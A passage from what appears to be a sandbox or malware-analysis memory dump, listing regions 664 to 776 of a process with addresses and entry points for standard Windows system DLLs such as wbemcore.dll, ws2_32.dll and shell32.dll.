filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 664 start_va = 0x7fef8f10000 end_va = 0x7fef8f83fff monitored = 0 entry_point = 0x7fef8f166f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 665 start_va = 0x7fef8f90000 end_va = 0x7fef8ffafff monitored = 0 entry_point = 0x7fef8fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 666 start_va = 0x7fef9000000 end_va = 0x7fef9012fff monitored = 0 entry_point = 0x7fef9001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 667 start_va = 0x7fef9020000 end_va = 0x7fef9081fff monitored = 0 entry_point = 0x7fef905bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 668 start_va = 0x7fef9090000 end_va = 0x7fef91bbfff monitored = 0 entry_point = 0x7fef9140ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 669 start_va = 0x7fef91c0000 end_va = 0x7fef91d9fff monitored = 0 entry_point = 0x7fef91d3fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 670 start_va = 0x7fef91e0000 end_va = 0x7fef9263fff monitored = 0 entry_point = 0x7fef9231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 671 start_va = 0x7fef9270000 end_va = 0x7fef9294fff monitored = 0 entry_point = 0x7fef9288c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 672 start_va = 0x7fef92a0000 end_va = 0x7fef92dcfff monitored = 0 entry_point = 0x7fef92a1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 673 start_va = 0x7fef92e0000 end_va = 0x7fef92edfff monitored = 0 entry_point = 0x7fef92e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 674 start_va = 0x7fef92f0000 end_va = 0x7fef9316fff monitored = 0 entry_point = 0x7fef92f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 675 start_va = 0x7fef9320000 end_va = 0x7fef93f2fff monitored = 0 entry_point = 0x7fef9398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 676 start_va = 0x7fef9440000 end_va = 0x7fef9486fff monitored = 0 entry_point = 0x7fef9441040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 677 start_va = 0x7fef9490000 end_va = 0x7fef94d1fff monitored = 0 entry_point = 0x7fef94917e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 678 start_va = 0x7fef94e0000 end_va = 0x7fef9571fff monitored = 0 entry_point = 0x7fef95551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 679 start_va = 0x7fef9580000 end_va = 0x7fef95f6fff monitored = 0 entry_point = 0x7fef95be7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 680 start_va = 0x7fef9600000 end_va = 0x7fef9639fff monitored = 0 entry_point = 0x7fef961d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 681 start_va = 0x7fef9670000 end_va = 0x7fef968cfff monitored = 0 entry_point = 0x7fef9672f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 682 start_va = 0x7fef96e0000 end_va = 0x7fef96f4fff monitored = 0 entry_point = 0x7fef96e1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 683 start_va = 0x7fef9910000 end_va = 0x7fef9920fff monitored = 0 entry_point = 0x7fef9919e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 684 start_va = 0x7fef9930000 end_va = 0x7fef9993fff monitored = 0 entry_point = 0x7fef9931254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 685 start_va = 0x7fef99a0000 end_va = 0x7fef9a10fff monitored = 0 entry_point = 0x7fef99a1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 686 start_va = 0x7fef9ab0000 end_va = 0x7fef9ac6fff monitored = 0 entry_point = 0x7fef9ab1060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 687 start_va = 0x7fef9ad0000 end_va = 0x7fef9c7ffff monitored = 0 entry_point = 0x7fef9ad1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 688 start_va = 0x7fef9f40000 end_va = 0x7fef9f48fff monitored = 0 entry_point = 0x7fef9f411a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 689 start_va = 0x7fefa170000 end_va = 0x7fefa1e6fff monitored = 0 entry_point = 0x7fefa17afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 690 start_va = 0x7fefa290000 end_va = 0x7fefa299fff monitored = 0 entry_point = 0x7fefa29260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 691 start_va = 0x7fefa2a0000 end_va = 0x7fefa3b1fff monitored = 0 entry_point = 0x7fefa2bf354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 692 start_va = 0x7fefa3c0000 end_va = 0x7fefa3cefff monitored = 0 entry_point = 0x7fefa3c7e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 693 start_va = 0x7fefa3d0000 end_va = 0x7fefa3d8fff monitored = 0 entry_point = 0x7fefa3d3668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 694 start_va = 0x7fefa3e0000 end_va = 0x7fefa3e8fff monitored = 0 entry_point = 0x7fefa3e1020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 695 start_va = 0x7fefa3f0000 end_va = 0x7fefa445fff monitored = 0 entry_point = 0x7fefa3f1040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 696 start_va = 0x7fefa450000 end_va = 0x7fefa4adfff monitored = 0 entry_point = 0x7fefa459024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 697 start_va = 0x7fefa4b0000 end_va = 0x7fefa4c7fff monitored = 0 entry_point = 0x7fefa4b1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 698 start_va = 0x7fefa4d0000 end_va = 0x7fefa4e0fff monitored = 0 entry_point = 0x7fefa4d16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 699 start_va = 0x7fefa520000 end_va = 0x7fefa572fff monitored = 0 entry_point = 0x7fefa522b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 700 start_va = 0x7fefa730000 end_va = 0x7fefa73afff monitored = 0 entry_point = 0x7fefa731198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 701 start_va = 0x7fefa740000 end_va = 0x7fefa766fff monitored = 0 entry_point = 0x7fefa7498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 702 start_va = 0x7fefa770000 end_va = 0x7fefa783fff monitored = 0 entry_point = 0x7fefa773e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 703 start_va = 0x7fefa7a0000 end_va = 0x7fefa806fff monitored = 0 entry_point = 0x7fefa7b6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 704 start_va = 0x7fefa810000 end_va = 0x7fefa81afff monitored = 0 entry_point = 0x7fefa814f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 705 start_va = 0x7fefa820000 end_va = 0x7fefa82bfff monitored = 0 entry_point = 0x7fefa8215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 706 start_va = 0x7fefa830000 end_va = 0x7fefa83ffff monitored = 0 entry_point = 0x7fefa83835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 707 start_va = 0x7fefa840000 end_va = 0x7fefa858fff monitored = 0 entry_point = 0x7fefa8411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 708 start_va = 0x7fefa860000 end_va = 0x7fefa896fff monitored = 0 entry_point = 0x7fefa868424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 709 start_va = 0x7fefa8e0000 end_va = 0x7fefa8f4fff monitored = 0 entry_point = 0x7fefa8e60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 710 start_va = 0x7fefa900000 end_va = 0x7fefa9c1fff monitored = 0 entry_point = 0x7fefa90101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 711 start_va = 0x7fefabe0000 end_va = 0x7fefabf6fff monitored = 0 entry_point = 0x7fefabe9d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 712 start_va = 0x7fefac00000 end_va = 0x7fefac08fff monitored = 0 entry_point = 0x7fefac01010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 713 start_va = 0x7fefacf0000 end_va = 0x7fefad1cfff monitored = 0 entry_point = 0x7fefacf1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 714 start_va = 0x7fefad20000 end_va = 0x7fefad30fff monitored = 0 entry_point = 0x7fefad214c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 715 start_va = 0x7fefae70000 end_va = 0x7fefae83fff monitored = 0 entry_point = 0x7fefae716b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 716 start_va = 0x7fefae90000 end_va = 0x7fefaea4fff monitored = 0 entry_point = 0x7fefae91050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 717 start_va = 0x7fefaeb0000 end_va = 0x7fefaebbfff monitored = 0 entry_point = 0x7fefaeb18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 718 start_va = 0x7fefaec0000 end_va = 0x7fefaed5fff monitored = 0 entry_point = 0x7fefaec11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 719 start_va = 0x7fefaff0000 end_va = 0x7fefb000fff monitored = 0 entry_point = 0x7fefaff1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 720 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 721 start_va = 0x7fefb5c0000 end_va = 0x7fefb615fff monitored = 0 entry_point = 0x7fefb5cbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 722 start_va = 0x7fefb620000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb6294bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 723 start_va = 0x7fefb750000 end_va = 0x7fefb76cfff monitored = 0 entry_point = 0x7fefb751ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 724 start_va = 0x7fefb7a0000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb92c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 725 start_va = 0x7fefbe30000 end_va = 0x7fefbe3bfff monitored = 0 entry_point = 0x7fefbe31064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 726 start_va = 0x7fefbe40000 end_va = 0x7fefbefafff monitored = 0 entry_point = 0x7fefbe46de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 727 start_va = 0x7fefbf00000 end_va = 0x7fefbf06fff monitored = 0 entry_point = 0x7fefbf014b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 728 start_va = 0x7fefbff0000 end_va = 0x7fefc00afff monitored = 0 entry_point = 0x7fefbff2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 729 start_va = 0x7fefc010000 end_va = 0x7fefc02dfff monitored = 0 entry_point = 0x7fefc0113b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 730 start_va = 0x7fefc030000 end_va = 0x7fefc041fff monitored = 0 entry_point = 0x7fefc031060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 731 start_va = 0x7fefc050000 end_va = 0x7fefc06efff monitored = 0 entry_point = 0x7fefc055c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 732 start_va = 0x7fefc120000 end_va = 0x7fefc158fff monitored = 0 entry_point = 0x7fefc12c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 733 start_va = 0x7fefc160000 end_va = 0x7fefc169fff monitored = 0 entry_point = 0x7fefc163cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 734 start_va = 0x7fefc170000 end_va = 0x7fefc17cfff monitored = 0 entry_point = 0x7fefc171348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 735 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 736 start_va = 0x7fefc350000 end_va = 0x7fefc37ffff monitored = 0 entry_point = 0x7fefc35194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 737 start_va = 0x7fefc380000 end_va = 0x7fefc3dafff monitored = 0 entry_point = 0x7fefc386940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 738 start_va = 0x7fefc4f0000 end_va = 0x7fefc4f6fff monitored = 0 entry_point = 0x7fefc4f142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 739 start_va = 0x7fefc500000 end_va = 0x7fefc554fff monitored = 0 entry_point = 0x7fefc501054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 740 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 741 start_va = 0x7fefc670000 end_va = 0x7fefc6a1fff monitored = 0 entry_point = 0x7fefc67144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 742 start_va = 0x7fefc6b0000 end_va = 0x7fefc6b7fff monitored = 0 entry_point = 0x7fefc6b2a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 743 start_va = 0x7fefc6c0000 end_va = 0x7fefc6c9fff monitored = 0 entry_point = 0x7fefc6c3b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 744 start_va = 0x7fefc6d0000 end_va = 0x7fefc6f1fff monitored = 0 entry_point = 0x7fefc6d5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 745 start_va = 0x7fefc750000 end_va = 0x7fefc77efff monitored = 0 entry_point = 0x7fefc751064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 746 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 747 start_va = 0x7fefc800000 end_va = 0x7fefc813fff monitored = 0 entry_point = 0x7fefc804160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 748 start_va = 0x7fefca60000 end_va = 0x7fefca82fff monitored = 0 entry_point = 0x7fefca61198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 749 start_va = 0x7fefcb00000 end_va = 0x7fefcb0afff monitored = 0 entry_point = 0x7fefcb01030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 750 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 751 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 752 start_va = 0x7fefcb70000 end_va = 0x7fefcc00fff monitored = 0 entry_point = 0x7fefcb71440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 753 start_va = 0x7fefcc10000 end_va = 0x7fefcc4cfff monitored = 0 entry_point = 0x7fefcc118f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 754 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 755 start_va = 0x7fefcc70000 end_va = 0x7fefcc7efff monitored = 0 entry_point = 0x7fefcc719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 756 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd11020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 757 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 758 start_va = 0x7fefcd90000 end_va = 0x7fefcefcfff monitored = 0 entry_point = 0x7fefcd910b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 759 start_va = 0x7fefcf00000 end_va = 0x7fefcf35fff monitored = 0 entry_point = 0x7fefcf01474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 760 start_va = 0x7fefcf40000 end_va = 0x7fefcf59fff monitored = 0 entry_point = 0x7fefcf41558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 761 start_va = 0x7fefd000000 end_va = 0x7fefd03afff monitored = 0 entry_point = 0x7fefd001324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 762 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 763 start_va = 0x7fefd490000 end_va = 0x7fefd4dcfff monitored = 0 entry_point = 0x7fefd491070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 764 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 765 start_va = 0x7fefd6f0000 end_va = 0x7fefe477fff monitored = 0 entry_point = 0x7fefd76cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 766 start_va = 0x7fefe480000 end_va = 0x7fefe656fff monitored = 0 entry_point = 0x7fefe481010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 767 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 768 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 769 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 770 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 771 start_va = 0x7fefea60000 end_va = 0x7fefeab1fff monitored = 0 entry_point = 0x7fefea610d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 772 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 773 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 774 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 775 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 776 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") 